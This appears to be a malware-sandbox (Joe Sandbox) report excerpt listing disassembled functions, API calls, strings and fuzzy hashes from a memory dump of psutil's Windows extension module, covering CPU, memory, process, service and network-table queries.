psutil/arch/windows\proc_handles.c, xrefs: 00007FFB9DD664A3, 00007FFB9DD66554
TerminateThread, xrefs: 00007FFB9DD66502
WaitForSingleObject, xrefs: 00007FFB9DD665B9
WaitForSingleObject -> WAIT_FAILED -> TerminateThread, xrefs: 00007FFB9DD665AD
CreateThread, xrefs: 00007FFB9DD6643F
GetExitCodeThread, xrefs: 00007FFB9DD665FB
(originated from %s), xrefs: 00007FFB9DD66448
WaitForSingleObject -> WAIT_FAILED, xrefs: 00007FFB9DD66578
get handle name thread timed out after %i ms, xrefs: 00007FFB9DD664CA

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: __acrt_iob_funcfprintf$Thread$CloseCreateErr_ErrorFilenameFromHandleLastObjectSingleTerminateWaitWindowsWith__stdio_common_vsprintf
String ID: (originated from %s)$CreateThread$GetExitCodeThread$GetExitCodeThread (failed) -> TerminateThread$TerminateThread$WaitForSingleObject$WaitForSingleObject -> WAIT_FAILED$WaitForSingleObject -> WAIT_FAILED -> TerminateThread$get handle name thread timed out after %i ms$psutil-debug [%s:%d]> $psutil/arch/windows\proc_handles.c
API String ID: 3855189052-3547020968
Opcode ID: 0616cab3c0598e9ddc42e09be41e4733b357dd79c3e0ec360cf4145d93dd7668
Instruction ID: f020a29b468b366988ea79d2c785226f64dbe698e55a9c77e55c365918bd1595
Opcode Fuzzy Hash: 0616cab3c0598e9ddc42e09be41e4733b357dd79c3e0ec360cf4145d93dd7668
Instruction Fuzzy Hash: 1F51DBE0B0CA4291FB349B77E8552B92261AF4DB84FC03136D58E462A5FE3DE54986C0

Function 00007FFB9DD62240 Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 131COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD6227B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD622A0
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD62298

Part of subcall function 00007FFB9DD61D70: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,00000000,00007FFB9DD67DB4), ref: 00007FFB9DD61DA7

GetLastError.KERNEL32 ref: 00007FFB9DD622C4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD622DB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD622E5
GetLogicalProcessorInformationEx.KERNELBASE ref: 00007FFB9DD62300
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6233D
Py_BuildValue.PYTHON3 ref: 00007FFB9DD62354
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD6242F
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD62439
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD62449

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD62291, 00007FFB9DD6238F, 00007FFB9DD6240E
GetLogicalProcessorInformationEx() returned %u, xrefs: 00007FFB9DD623B1
psutil/arch/windows\cpu.c, xrefs: 00007FFB9DD62287, 00007FFB9DD62385, 00007FFB9DD62404
GetLogicalProcessorInformationEx() count was 0, xrefs: 00007FFB9DD62425
Win < 7; cpu_count_cores() forced to None, xrefs: 00007FFB9DD622A6

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: __acrt_iob_funcfprintf$free$BuildErrorInformationLastLogicalProcessorValue__stdio_common_vfprintfmalloc
String ID: GetLogicalProcessorInformationEx() count was 0$GetLogicalProcessorInformationEx() returned %u$Win < 7; cpu_count_cores() forced to None$psutil-debug [%s:%d]> $psutil/arch/windows\cpu.c
API String ID: 3169716632-2623797460
Opcode ID: 9a37ace3c8a14a6a00afd14260db1a26e60c3b402299a2fdffc2dd5e8a3c3ec2
Instruction ID: 757f98ce2a732f718a855af789671b482bbbe7df5367ef0976861a24231b09aa
Opcode Fuzzy Hash: 9a37ace3c8a14a6a00afd14260db1a26e60c3b402299a2fdffc2dd5e8a3c3ec2
Instruction Fuzzy Hash: 725155A1F08A4282EB349B77E8541796761EF4DB80FC5213AC98D076A5FF2DE845C6C1

Function 00007FFB9DD63DC0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 178COMMON

Download Yara Rule

APIs

PyDict_New.PYTHON3 ref: 00007FFB9DD63DE5

Part of subcall function 00007FFB9DD63670: GetAdaptersAddresses.IPHLPAPI ref: 00007FFB9DD63690
Part of subcall function 00007FFB9DD63670: PyErr_SetString.PYTHON3 ref: 00007FFB9DD636AC

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD63E40
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD63E4E
GetIfTable.IPHLPAPI ref: 00007FFB9DD63E6C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD63E7A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD63E84
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD63E92
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD64051
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6405F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD6406D

Strings

%wS, xrefs: 00007FFB9DD63EF4
GetIfTable() syscall failed, xrefs: 00007FFB9DD63EB9
(Oikk), xrefs: 00007FFB9DD63F75

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err_free$Memorymalloc$AdaptersAddressesDeallocDict_StringTable
String ID: %wS$(Oikk)$GetIfTable() syscall failed
API String ID: 2607516402-3214263222
Opcode ID: 935595f68735a42025d1daf878037448eb2c0eb1bd1990644127996632be68e7
Instruction ID: f92e14d1937b8b1c790d8fd7ef6c38b4c999cd84c3dae861157ef2d5907cd7f1
Opcode Fuzzy Hash: 935595f68735a42025d1daf878037448eb2c0eb1bd1990644127996632be68e7
Instruction Fuzzy Hash: B6813FB1B0CA8685EB749F72E4042B963A0FF5DB54F886031DA8E47654FF3DE4048380

Function 00007FFB9DD684D0 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 163serviceCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD684ED
QueryServiceConfigW.ADVAPI32 ref: 00007FFB9DD6854B
GetLastError.KERNEL32 ref: 00007FFB9DD68551
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD6856B

Strings

QueryServiceConfigW, xrefs: 00007FFB9DD6855C, 00007FFB9DD6859D
disabled, xrefs: 00007FFB9DD6863B
automatic, xrefs: 00007FFB9DD6864D
(OOOs), xrefs: 00007FFB9DD6865F
unknown, xrefs: 00007FFB9DD68632
manual, xrefs: 00007FFB9DD68644

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Service$Arg_CloseConfigErrorHandleLastParseQueryTuple
String ID: (OOOs)$QueryServiceConfigW$automatic$disabled$manual$unknown
API String ID: 2875933263-3989453403
Opcode ID: 4f8a934ceacdef149da47496c8c0265f9ba17993743bd7f42fb56ea816f95630
Instruction ID: 0f67537df729538b06d8dae7b7d2bb99cd9083ae6335ae62d264a2a824cbda3f
Opcode Fuzzy Hash: 4f8a934ceacdef149da47496c8c0265f9ba17993743bd7f42fb56ea816f95630
Instruction Fuzzy Hash: 01615CB1B0DA4286EA749F37E85417923A0BF5DB94BC56131CA9E027A4FF3CE545C780

Function 00007FFB9DD64300 Relevance: 47.4, APIs: 18, Strings: 9, Instructions: 113COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD64318

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD64421
WaitForSingleObject() returned WAIT_TIMEOUT, xrefs: 00007FFB9DD643EC
automatically set for PID 0, xrefs: 00007FFB9DD64333
WaitForSingleObject() -> WAIT_ABANDONED, xrefs: 00007FFB9DD64439
OpenProcess, xrefs: 00007FFB9DD64384
WaitForSingleObject, xrefs: 00007FFB9DD643D1
GetExitCodeProcess, xrefs: 00007FFB9DD6449D
WaitForSingleObject() returned WAIT_ABANDONED, xrefs: 00007FFB9DD64464
psutil/arch/windows\proc.c, xrefs: 00007FFB9DD6441A

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Arg_ParseTuple
String ID: GetExitCodeProcess$OpenProcess$WaitForSingleObject$WaitForSingleObject() -> WAIT_ABANDONED$WaitForSingleObject() returned WAIT_ABANDONED$WaitForSingleObject() returned WAIT_TIMEOUT$automatically set for PID 0$psutil-debug [%s:%d]> $psutil/arch/windows\proc.c
API String ID: 3371842430-1306819463
Opcode ID: 5e6c3f8e62c44b61b55eae0613985ac3f476f52ce4f9b0455584aa147b6f3dcd
Instruction ID: fca939a2a265285b78f8772c79a6a07d815881d4de98385bb463f0a0c021f93a
Opcode Fuzzy Hash: 5e6c3f8e62c44b61b55eae0613985ac3f476f52ce4f9b0455584aa147b6f3dcd
Instruction Fuzzy Hash: 5E510CA5B1C94682EA609B76E8501796761FF4DB94FC42032DACD43674FF2CE549C780

Function 00007FFB9DD63500 Relevance: 42.1, APIs: 17, Strings: 7, Instructions: 79COMMON

Download Yara Rule

APIs

PdhOpenQueryW.PDH ref: 00007FFB9DD6350D
PyErr_Format.PYTHON3 ref: 00007FFB9DD63528
PdhAddEnglishCounterW.PDH ref: 00007FFB9DD63549
PdhCloseQuery.PDH ref: 00007FFB9DD63558
PdhCollectQueryData.PDH ref: 00007FFB9DD6356C
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD63584
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD635A1

Part of subcall function 00007FFB9DD61D70: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,00000000,00007FFB9DD67DB4), ref: 00007FFB9DD61DA7

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD635AB
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD635BB
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD635C5
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD635D5
PdhGetFormattedCounterValue.PDH ref: 00007FFB9DD635F1
PdhCloseQuery.PDH ref: 00007FFB9DD63600
PyErr_Format.PYTHON3 ref: 00007FFB9DD63617
PdhRemoveCounter.PDH ref: 00007FFB9DD63634
PdhCloseQuery.PDH ref: 00007FFB9DD6363F
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63654

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD6359A
PdhGetFormattedCounterValue failed, xrefs: 00007FFB9DD6360D
\Paging File(_Total)\% Usage, xrefs: 00007FFB9DD63542
psutil/arch/windows\mem.c, xrefs: 00007FFB9DD63590
PdhAddEnglishCounterW failed. Performance counters may be disabled., xrefs: 00007FFB9DD6355E
PdhOpenQueryW failed, xrefs: 00007FFB9DD63517
PdhCollectQueryData failed; assume swap percent is 0, xrefs: 00007FFB9DD635B4

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Query$CloseCounter__acrt_iob_funcfprintf$Err_FormatValue$BuildCollectDataEnglishFormattedOpenRemove__stdio_common_vfprintf
String ID: PdhAddEnglishCounterW failed. Performance counters may be disabled.$PdhCollectQueryData failed; assume swap percent is 0$PdhGetFormattedCounterValue failed$PdhOpenQueryW failed$\Paging File(_Total)\% Usage$psutil-debug [%s:%d]> $psutil/arch/windows\mem.c
API String ID: 3912788753-2726665533
Opcode ID: 6091d7e37bc3da2c18867fe3a59bf85e485e3be35cbc6a9b6daeb4a7ddad396e
Instruction ID: 2bd24ad52e439545303ef17fd796c94de74903c88b99573a2afc15cab8a39e5a
Opcode Fuzzy Hash: 6091d7e37bc3da2c18867fe3a59bf85e485e3be35cbc6a9b6daeb4a7ddad396e
Instruction Fuzzy Hash: 2D412FB1B18E4681E6209B77E8541BA2361FF8CB85FC57132D98E42664FE2DF549C780

Function 00007FFB9DD68750 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 113serviceCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD6876B
QueryServiceStatusEx.ADVAPI32 ref: 00007FFB9DD687BA
GetLastError.KERNEL32 ref: 00007FFB9DD687C0
CloseServiceHandle.ADVAPI32 ref: 00007FFB9DD687D0
Py_BuildValue.PYTHON3 ref: 00007FFB9DD687E4

Strings

QueryServiceStatusEx, xrefs: 00007FFB9DD68809, 00007FFB9DD6887D
unknown, xrefs: 00007FFB9DD688E7
(sk), xrefs: 00007FFB9DD688F2

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Service$Arg_BuildCloseErrorHandleLastParseQueryStatusTupleValue
String ID: (sk)$QueryServiceStatusEx$unknown
API String ID: 740867558-71987940
Opcode ID: 77025846c52352fd7251d3eb9722b8e4bc73f7b2a5d6a870d129b6edc9eeed89
Instruction ID: a19cd6813b2f6225157e4bf50fb761db06983309c4cbc2736ff3a3482135fd6b
Opcode Fuzzy Hash: 77025846c52352fd7251d3eb9722b8e4bc73f7b2a5d6a870d129b6edc9eeed89
Instruction Fuzzy Hash: 8E512CA1B1CA8682EB24DF77E8541796761FF8DB84F846035DA8D43B68FF2CE5058780

Function 00007FFB9DD63750 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

PyDict_New.PYTHON3 ref: 00007FFB9DD6375A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD637A5
GetIfEntry2.IPHLPAPI ref: 00007FFB9DD637CC
Py_BuildValue.PYTHON3 ref: 00007FFB9DD63840
PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD6386A
PyDict_SetItem.PYTHON3 ref: 00007FFB9DD63881
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6389A
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD638A9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD638B2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD638C8

Strings

(KKKKKKKK), xrefs: 00007FFB9DD63839
GetIfEntry() or GetIfEntry2() syscalls failed., xrefs: 00007FFB9DD63900

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: DeallocDict_free$BuildCharEntry2FromItemUnicode_ValueWidemalloc
String ID: (KKKKKKKK)$GetIfEntry() or GetIfEntry2() syscalls failed.
API String ID: 1733073734-1738093298
Opcode ID: 1499f1d03885d1517dcd4e575db20559d8a4ca09919331753b40a178ac74a361
Instruction ID: e2f03f6d3e89de503512e93d2e9528cb1cf3a412a73d297c2f6480f2fd24c1b2
Opcode Fuzzy Hash: 1499f1d03885d1517dcd4e575db20559d8a4ca09919331753b40a178ac74a361
Instruction Fuzzy Hash: 9651F8B1B09F8A85EA649F76E84027923A0BF59F95F886036CE8D47754FF3CD4458780

Function 00007FFB9DD62850 Relevance: 33.3, APIs: 14, Strings: 5, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD62875
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD62891
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD628AE
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD628B8
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD628C8
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFB9DD628D2
fprintf.MSPDB140-MSVCRT ref: 00007FFB9DD628E2
PyErr_SetString.PYTHON3 ref: 00007FFB9DD62902
LocalAlloc.KERNEL32 ref: 00007FFB9DD62926
PyErr_SetFromWindowsErr.PYTHON3 ref: 00007FFB9DD62936

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD628A7
psutil/arch/windows\cpu.c, xrefs: 00007FFB9DD6289D
GetActiveProcessorCount() not available; using GetSystemInfo(), xrefs: 00007FFB9DD628C1
CallNtPowerInformation syscall failed, xrefs: 00007FFB9DD62969
GetSystemInfo() failed to retrieve CPU count, xrefs: 00007FFB9DD628F8

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err___acrt_iob_funcfprintf$FromWindows$AllocLocalString
String ID: CallNtPowerInformation syscall failed$GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$psutil-debug [%s:%d]> $psutil/arch/windows\cpu.c
API String ID: 2295254528-3941425547
Opcode ID: 7f1085dd1837f1ef6c884fc82ca1ac5c739219d033371bc9354c9bbd6e1ca84a
Instruction ID: e43ae8c7f8e087b271506a4d46085ba65ebf05cc1cab7ce602644c92f9274d11
Opcode Fuzzy Hash: 7f1085dd1837f1ef6c884fc82ca1ac5c739219d033371bc9354c9bbd6e1ca84a
Instruction Fuzzy Hash: FB4123A5F08A5282F7249B37E85427963A0EF8CB94F842436C98D477A4FF2DE585C780

Function 00007FFB9DD678F0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD6414C), ref: 00007FFB9DD6791E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD6414C), ref: 00007FFB9DD6792D
EnumProcesses.PSAPI(?,?,?,00007FFB9DD6414C), ref: 00007FFB9DD67945
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD6414C), ref: 00007FFB9DD67982
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9DD6414C), ref: 00007FFB9DD67992

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD679DE
psutil/arch/windows\proc_utils.c, xrefs: 00007FFB9DD679D4
psutil_get_pids() failed, xrefs: 00007FFB9DD679F8

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: free$EnumProcessesmalloc
String ID: psutil-debug [%s:%d]> $psutil/arch/windows\proc_utils.c$psutil_get_pids() failed
API String ID: 3948894879-1935701007
Opcode ID: ff672f8289a3b97dcb8ef021960101f72c74e6f4998979b71bc7c99b120796fa
Instruction ID: b2479f6749a2247a18a380f6b34f0ce1750e8f5338a03dc8303f583549d05791
Opcode Fuzzy Hash: ff672f8289a3b97dcb8ef021960101f72c74e6f4998979b71bc7c99b120796fa
Instruction Fuzzy Hash: 8B318AA5F08A0652EB349B37E8542756261AF4DF80F952036D9CE02694FE3CD44586C0

Function 00007FFB9DD65DD0 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

PyList_New.PYTHON3 ref: 00007FFB9DD65DF8
PyArg_ParseTuple.PYTHON3 ref: 00007FFB9DD65E31
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD65E70
GetMappedFileNameW.PSAPI ref: 00007FFB9DD65EA0
PyUnicode_FromWideChar.PYTHON3 ref: 00007FFB9DD65ECF
VirtualQueryEx.KERNEL32 ref: 00007FFB9DD65FC1
CloseHandle.KERNEL32 ref: 00007FFB9DD65FD3
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FED
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD65FFC
_Py_Dealloc.PYTHON3 ref: 00007FFB9DD6600B
CloseHandle.KERNEL32 ref: 00007FFB9DD66019

Strings

(KsOI), xrefs: 00007FFB9DD65F57

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Dealloc$CloseHandleQueryVirtual$Arg_CharFileFromList_MappedNameParseTupleUnicode_Wide
String ID: (KsOI)
API String ID: 1797541475-341566991
Opcode ID: e8262880df8a5ced126a4acda91b6844434ec5fe8cc853d141dd748cfa495d7f
Instruction ID: 82029e6610030f50fd10b7dad12218563c94dc2d020c28be18be675aa91c67ca
Opcode Fuzzy Hash: e8262880df8a5ced126a4acda91b6844434ec5fe8cc853d141dd748cfa495d7f
Instruction Fuzzy Hash: B65170B1B09A4285EA748B33E45827963A4FF5DB90F846135DD9E03794FE3CE445C380

Function 00007FFB9DD68E20 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 92COMMON

Download Yara Rule

APIs

GetExtendedUdpTable.IPHLPAPI ref: 00007FFB9DD68E53
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD68E70
PyErr_NoMemory.PYTHON3 ref: 00007FFB9DD68E7E
GetExtendedUdpTable.IPHLPAPI ref: 00007FFB9DD68EB4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB9DD68ED6
PyErr_SetString.PYTHON3 ref: 00007FFB9DD68EFA

Strings

psutil-debug [%s:%d]> , xrefs: 00007FFB9DD68F36
psutil/arch/windows\socks.c, xrefs: 00007FFB9DD68F2C
GetExtendedUdpTable failed, xrefs: 00007FFB9DD68EF0
GetExtendedUdpTable: retry with different bufsize, xrefs: 00007FFB9DD68F50

Memory Dump Source

Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true

Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd

Similarity

API ID: Err_ExtendedTable$MemoryStringfreemalloc
String ID: GetExtendedUdpTable failed$GetExtendedUdpTable: retry with different bufsize$psutil-debug [%s:%d]> $psutil/arch/windows\socks.c
API String ID: 70375929-1528784589
Opcode ID: 55d9d9dc3374df7a068daad7abfd02b2fd5b4a564289884e1b0134a6938486be
Instruction ID: 64a2a7c3ce5bfb824976a4a6a34a5ad0eca1cd3859b0ca0540c65698e4c8bd44
Opcode Fuzzy Hash: 55d9d9dc3374df7a068daad7abfd02b2fd5b4a564289884e1b0134a6938486be
Instruction Fuzzy Hash: B74178B5B08A0282E7249B3AF45427963B1FF8C784F856036D98D437A5FF7DD5858B80

Function 00007FFB9DD68CA0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 92COMMON

Download Yara Rule

APIs

GetExtendedTcpTable.IPHLPAPI ref: 00007FFB9DD68CD3
